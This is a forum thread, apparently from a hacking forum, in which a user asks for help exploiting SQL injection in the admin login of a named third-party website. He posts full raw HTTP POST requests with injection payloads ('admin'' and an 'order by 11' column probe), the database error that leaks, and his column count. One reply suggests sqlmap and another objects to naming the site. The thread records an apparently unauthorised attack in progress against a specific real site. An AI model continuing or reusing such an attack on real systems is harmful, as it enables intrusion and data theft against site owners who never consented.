help with sql injection

M

man474019

Member
27.06.2018
12
1
Hi all
please help to exploit sqli
POST /adminiztrator.php HTTP/1.1
Host: escortahmedabad.info
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
Content-Type: multipart/form-data; boundary=---------------------------2276829840405
Content-Length: 359
Cookie: PHPSESSID=1nold7pifrllhsa5gpjtkoqtg6
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------2276829840405
Content-Disposition: form-data; name="action"

login
-----------------------------2276829840405
Content-Disposition: form-data; name="login"

admin'
-----------------------------2276829840405
Content-Disposition: form-data; name="password"

a
-----------------------------2276829840405--
response is
help with sql injection

I check for exploit with error-based vector, but can not

and when doing
POST /adminiztrator.php HTTP/1.1
Host: escortahmedabad.info
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
Content-Type: multipart/form-data; boundary=---------------------------2276829840405
Content-Length: 356
Cookie: PHPSESSID=1nold7pifrllhsa5gpjtkoqtg6
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------2276829840405
Content-Disposition: form-data; name="action"

login
-----------------------------2276829840405
Content-Disposition: form-data; name="login"

a' order by 11-- -
-----------------------------2276829840405
Content-Disposition: form-data; name="password"

a
-----------------------------2276829840405--
response is Unknown column '11' in 'order clause'
there is 10 columns
but i don't know how to expolit then
thanks !
 
5h3ll

5h3ll

Mod. Ethical Hacking
Red Team
23.01.2018
351
568
have u try sqlmap with post request?
 
  • Нравится
Реакции: The Codeby
M

man474019

Member
27.06.2018
12
1
yes bro, i tried and with level, risk parameters also, but no result
 
T

Tsunami

Active member
04.05.2018
31
24
I think this is the trick of the creator of the site.
However, please remove the site name from the sample requests.
(this is not ethical in relation to the site owner)
 
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб